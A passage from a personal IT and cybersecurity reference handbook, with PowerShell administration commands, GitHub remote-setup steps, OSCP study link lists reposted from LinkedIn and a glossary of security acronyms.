    Install-WindowsFeature -IncludeAllSubfeature -IncludeManagementTools File-Services

62. Install .Net Framework

    Install-WindowsFeature Net-Framework-Core -source d:\sources\sxs

63. Repair trust relationship of a computer

    test-computersecurechannel -credential domain\admin -Repair

64. To list all computers in AD:

    get-adcomputer -filter *|select -ExpandProperty name

65. List services running on all computers in your domain:

    invoke-command -ComputerName (get-adcomputer -filter *|select -ExpandProperty name) -scriptblock { get-service }

66. Implicit Remoting:

    Establish a session with remote computer: $session = New-PSSession -ComputerName ABCD
    Invoke-Command -Session $session -ScriptBlock { import-module activedirectory }
    Import-PSSession -Session $session -Module ActiveDirectory
    Close session: get-PSSession | remove-PSSession

67. Invoke a powershell session on a remote computer:

    Enter-PSSession -ComputerName ABCD

68. Invoke Troubleshooting pack:

    import-module troubleshootingpack
    get-troubleshootingpack c:\windows\diagnostics\system\Networking
    get-troubleshootingpack c:\windows\diagnostics\system\Networking| Invoke-TroubleshootingPack

69. Replacement for ipconfig /all

    get-NetIPConfiguration

70. Find out network adapter names and statistics

    get-NetAdapter
    get-NetAdapterStatistics

31. Github Reference

31.1. Adding a new repository to github.com

• On the github.com page, click on

• Select "New Repository"

• Provide repository name in the provided field

• Click to create repository

• Follow instructions on the page displayed on you local computer which has ssh access to github.

31.2. Creating a local folder on your computer

• Change Directory to the root folder where you want the GIT repository to be stored

• Clone the respository

  git clone <repository URL from git page>

31.3. What to do after renaming your github username?

After you have changed your github.com user name, you will have to relink all your local github repositories to the github on the web. Here are the steps:

1. Open GitCMD or GitBASH

2. Change directory to the repository where you have cloned the respository from the web

3. Check where does this repository points:

   git remote -v

1. Change to new github repository

   git remote set-url origin git@github.com:secprivrisk/CyberSecurity.git

2. Confirm the change by issuing the command:

   git remote -v

32. Cheat Sheets

1. Cheat Sheets to help you in configuring your systems

2. IR Cheat Sheets

3. SANS DFIR Community: Cheat Sheets

4. IT and Information Security Cheat Sheets

5. 4 Cheat Sheets for Malware Analysis

6. Volatility Cheatsheet

33. Ethical Hacking References

33.1. By Mayur Parmar

Want resource for OSCP? here is the material to clear OSCP. All the best for your journey. How to prepare for OSCP complete guide

Below are 5 skills which you have to improve before registering for OSCP > Learn basic of Computer Network, Web application, and Linux > Learn Bash and Python scripting > Enumeration is key in OSCP lab, I repeat Enumeration is key in OSCP Lab and in real world too > Download vulnerable VM machines from vulnhub > Buffer Overflow (BOF) exploitation

Below are the free reference before registration of OSCP > https://lnkd.in/fBcwnBF > https://lnkd.in/fXtRZK5 > https://lnkd.in/fcHg29E > https://lnkd.in/f2-wBQJ > https://lnkd.in/fkFNATW

Below are the reference for Buffer overflow and exploit developmet for OSCP > https://lnkd.in/fmmU_Uz > https://lnkd.in/fZDh9Vd

For Bash Scripting > https://lnkd.in/fn2wpZ5

Transferring Files from Linux to Windows & post-exploitation > https://lnkd.in/fSJ44Eb > https://lnkd.in/fJUGq3s

Privilege Escalation: > https://lnkd.in/f4jsZfa > https://lnkd.in/fFAeE3g > https://lnkd.in/fUx6HZQ > https://lnkd.in/fDNJGHw > https://lnkd.in/fqPJzMP > https://lnkd.in/fixKjR6 > https://lnkd.in/f2Nz3_a > https://lnkd.in/fpZcJT9

Some tips and tricks for OSCP Exam & write-ups. https://lnkd.in/fWugM5F https://lnkd.in/fs_dDJr https://lnkd.in/fzh5M_V https://lnkd.in/fV3m55b https://lnkd.in/faWFaea https://lnkd.in/fiFGmV9 https://lnkd.in/fShfYRe https://lnkd.in/f9mKEgu https://lnkd.in/fjuxWZ5 https://lnkd.in/ffett24 https://lnkd.in/fivVvaz https://lnkd.in/f973szJ https://lnkd.in/f8ec7z5

33.2. By Pethuraj M

Following references were posted on LinkedIn by https://www.pethuraj.in https://www.pethuraj.com

• 𝗔𝘄𝗲𝘀𝗼𝗺𝗲 𝗥𝗲𝘀𝗼𝘂𝗿𝗰𝗲𝘀 𝗙𝗼𝗿 𝗟𝗲𝗮𝗿𝗻𝗶𝗻𝗴 𝗛𝗮𝗰𝗸𝗶𝗻𝗴 & 𝗣𝗲𝗻𝘁𝗲𝘀𝘁𝗶𝗻𝗴 http://tiny.cc/s5Ig

• 𝗥𝗲𝘀𝗼𝘂𝗿𝗰𝗲𝘀-𝗳𝗼𝗿-𝗹𝗲𝗮𝗿𝗻𝗶𝗻𝗴-𝗛𝗮𝗰𝗸𝗶𝗻𝗴 http://tiny.cc/7OiG

• 𝗘𝘁𝗵𝗶𝗰𝗮𝗹 𝗛𝗮𝗰𝗸𝗶𝗻𝗴 & 𝗖𝘆𝗯𝗲𝗿 𝘀𝗲𝗰𝘂𝗿𝗶𝘁𝘆 𝗕𝗶𝗯𝗹𝗲 http://tiny.cc/0wGg

• 𝗖𝘆𝗯𝗲𝗿 𝗦𝗲𝗰𝘂𝗿𝗶𝘁𝘆 𝗥𝗲𝘀𝗼𝘂𝗿𝗰𝗲𝘀 http://tiny.cc/m6Ig

• 𝗔𝘄𝗲𝘀𝗼𝗺𝗲 𝗛𝗮𝗰𝗸𝗶𝗻𝗴 𝗥𝗲𝘀𝗼𝘂𝗿𝗰𝗲𝘀 http://tiny.cc/pqJg

• 𝗲𝘁𝗵𝗶𝗰𝗮𝗹-𝗵𝗮𝗰𝗸𝗶𝗻𝗴-𝗿𝗲𝗽𝗼𝘀𝗶𝘁𝗼𝗿𝘆 http://tiny.cc/IqYg

• 𝗙𝗿𝗲𝗲 𝗘𝘁𝗵𝗶𝗰𝗮𝗹 𝗛𝗮𝗰𝗸𝗶𝗻𝗴 𝗲𝗕𝗼𝗼𝗸𝘀 http://tiny.cc/b6Rg

#cybersecurity #hackerone #bugcrowd #wapt #pentest #security #hacking #pentesting #bugbounty #owasp #burpsuite #ceh #oscp #ethicalhacking #infosec

34. Terms Used

ATT&CK	Adversatial Tactics Techniques & Common Knowledge
APT	Advanced Persistent Threat
CTF	Capture The Flag
CTI	Cyber Threat Intelligence
EDR	Endpoint Detection and Response
ICS	Industrial Conrol Systems
IOC	Indicators of Compromise
LLMNR	Link Local Multicast Name Resolution
Med-jacking	is a new kind of cybersecurity threat to health care systems. Medjacking involves hacking into medical devices using backdoors to access software on the device.
mDNS	Multicast Domain Name System
MDR	Managed Detection and Response
MSSP	Managed Security Services Provider
OCG	Organized Criminal groups
OSINT	Open Source Inteligence Tools: Gathering odata from open source or readily and freely available sources
PLC	Programmagle Logic controller
SIGINT	Signals Intelligence is the act of gathering information in transit by interception.
Smishing	Phishing through SMS
TTP	Techniques, Tactics, Procedures
UEBA	User Entity Behaviorial Analytics
Vishing	Phishing through voice calls
WPAD	Web Proxy Auto Discovery Protocol

References & Links

1. Writing Position Papers: http://www.studygs.net/wrtstr9.htm

2. Cover Page graphic: https://www.pinterest.com/pin/352758583290504850/

3. What is Malware?

4. Bug Hunter Handbook